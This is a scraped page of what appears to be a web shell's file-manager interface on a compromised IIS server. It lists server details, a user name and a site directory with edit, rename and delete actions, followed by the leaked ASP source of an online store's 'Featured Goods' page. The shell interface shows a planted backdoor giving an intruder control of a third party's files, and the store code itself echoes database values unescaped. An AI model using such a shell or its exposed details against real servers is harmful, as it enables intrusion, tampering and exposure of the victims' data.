Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!--#include file="conn1.asp"--> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Featured Goods</title> <style type="text/css"> <!-- .STYLE1 {color: #FF0000} .STYLE2 { font-family: Verdana, Arial, Helvetica, sans-serif; font-size:15px } --> </style> </head> <body style="width:800px"> <style type="text/css"> a{ position:relative; text-decoration:none; color:#666666; } a:hover{ position:relative; text-decoration:underline; } #cls{ position:relative; clear:both; } ul#proDes{ margin:0px auto; width:100%; padding:0px; } ul#proDes li{ position:relative; list-style-type:none; float:left; margin:5px; width:180px; height:250px; text-align:left; } ul#proDes li p{ position:absolute; top:225px; } ul#proDes li a.img{ position:absolute; display:block; text-decoration:none; color:#666666; width:100%; height:240px; } ul#proDes li a.img:hover{ position:absolute; display:block; text-decoration:underline; } ul#proDes li a.img img{ position:relative; width:180px; border:#f2f2f2 solid 1px; display:block; } ul#proDes li a.img img:hover{ position:relative; width:180px; border:#f00 solid 1px; display:block; } p#page{ text-align:right; } p#page a.img{ font-size:16px; display:inline-table; } p#page a.img.color{ position:relative; border:#00FFFF solid 1px; } p#page a.img:hover{ position:relative; background-color:#CCCCCC; } li.hover a.watch{ position:absolute; z-index:999; width:50px; height:15px; display:block; text-align:center; top:10px; left:10px; background-color:#CCCCCC; } a.watch{ position:absolute; z-index:999; width:50px; height:30px; display:none; top:10px; left:10px; } p#page{ text-align:right; } p#page a{ font-size:16px; display:inline-table; } p#page a.color{ position:relative; border:#00FFFF solid 1px; } p#page a:hover{ position:relative; background-color:#CCCCCC; } </style> <script type="text/javascript"> function hasClass(element, className) { var reg = new RegExp('(\\s|^)'+className+'(\\s|$)'); return element.className.match(reg); } function addClass(element, className) { if (!this.hasClass(element, className)) { element.className += " "+className; } } function removeClass(element, className) { if (hasClass(element, className)) { var reg = new RegExp('(\\s|^)'+className+'(\\s|$)'); element.className = element.className.replace(reg,' '); } } </script> <% set rsPro = server.CreateObject("adodb.recordset") sqlPro = "Select * From usedproductlist Where store>0" rsPro.open sqlPro,conn,1,1 if not rsPro.eof then if Request.QueryString("pages")<>"" then rsPro.Pagesize = Request.QueryString("pages") else rsPro.Pagesize = 48 end if page = 1 if not IsEmpty(Request("page")) then page = Cint(Request("page")) if page >rsPro.pagecount then rsPro.AbsolutePage = rsPro.PageCount elseif page <= 0 then page = 1 else rsPro.AbsolutePage = page end if end if page = rsPro.AbsolutePage %> <script type="text/javascript"> function getCookie(name) { var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)"); if(arr=document.cookie.match(reg)) return unescape(arr[2]); else return null; } function watchs(){ var id = '<%=Session("UserId") %>'; if (id == "" || id==null) { alert("Please Login in,or Register"); }else{ window.location.href = "newproductdetailused.asp?productid=<%=rsPro("productid")%>"; } } </script> <% end if %> <div class="STYLE2"> <p><span class="STYLE1">Please Attention:</span><br> 1. All product selling under "<span class="STYLE1">Special Items" </span>column are <span class="STYLE1">FINAL sale, NO Return & NO Refund.</span><br /> 2. The product maybe lightly used,minor damaged or simply an old model,but all of them were in  <span class="STYLE1">good working condition</span>, we will offer you a certain warranty period for the machines. Please kindly take notice of this before payment,thank you. </div> <div style=" background-color:#FFFFFF;margin:0px auto;"> <p id="page"> <% pages = request.QueryString("pages") if pages = "" then pages = 48 end if %> Items per page: <a href="?pages=24&id=used" <%if pages = 24 then%>class="color"<%end if%>>24</a> <a href="?pages=48&id=used" <%if pages = 48 then%>class="color"<%end if%>>48</a> <a href="?pages=96&id=used" <%if pages = 96 then%>class="color"<%end if%>>96</a> <a href="?pages=192&id=used" <%if pages = 192 then%>class="color"<%end if%>>192</a> </p> <ul id="proDes"> <% if rsPro.eof and rsPro.bof then else x = 1 for i = 1 to rsPro.Pagesize if rsPro.eof then Exit for productprice=rsPro("usprice") Response.Write "<li onmouseover='addClass(this,""hover"")' onmouseout = 'removeClass(this,""hover"")'>" Response.Write "<a class='img' href='newproductdetailused.asp?productid="&rsPro("productid")&"'> " Response.Write " <img src='"&rsPro("ImgPrev")&"' /><br/>" if Len(rsPro("productname")) > 40 then Response.Write rsPro("productid")&":"&left(rsPro("productname"),37)&"..." else Response.Write rsPro("productid")&":"&rsPro("productname")&"" end if Response.Write " </a>" Response.Write "<p>Price($):"&productprice&"</p>" Response.Write " <a href='javascript:void;' onclick='watchs()' class='watch'>Watch</a>" Response.Write "</li>" rsPro.movenext x = x +1 next end if %> </ul> <div id="cls"></div> <%if request("Page")<1 then%> << < <%else%> <a title="Previous" Href="?Page=<% = 1%><%if pages<>"" then response.Write("&pages="&pages)%>"><<</a> <a title="Home" Href="?Page=<% =request("Page") -1 %><%if pages<>"" then response.Write("&pages="&pages)%>"><</a> <%end if %> <% if page>20 then s1=page-20 else s1=1 if page<rsPro.pagecount-20 then s2=page+20 else s2=rsPro.pagecount if s1>=20 then response.write "..." for j=s1 to s2 if j=page then %> <a href="?page=<%=j%>&<%if pages <>"" then%>pages=<%=pages%><%end if%>"><font color=#ff0000><%=j%></font></a> <%else%> <a href="?page=<%=j%>&<%if pages <>"" then%>pages=<%=pages%><%end if%>"><%=j%></a> <%end if next if s2<rsPro.pagecount then response.write "..." %> <%if request("Page") = rsPro.PageCount then %> > >> <%else%> <a title="Next" Href="?Page=<% = page+ 1%><%if pages<>"" then%>&pages=<%=pages%><%end if%>">></a> <a title="End" Href="?Page=<% = rsPro.PageCount%><%if pages<>"" then%>&pages=<%=pages%><%end if%>">>></a> <% end if %> <% rsPro.close set rsPro = nothing %> </div> </body> </html>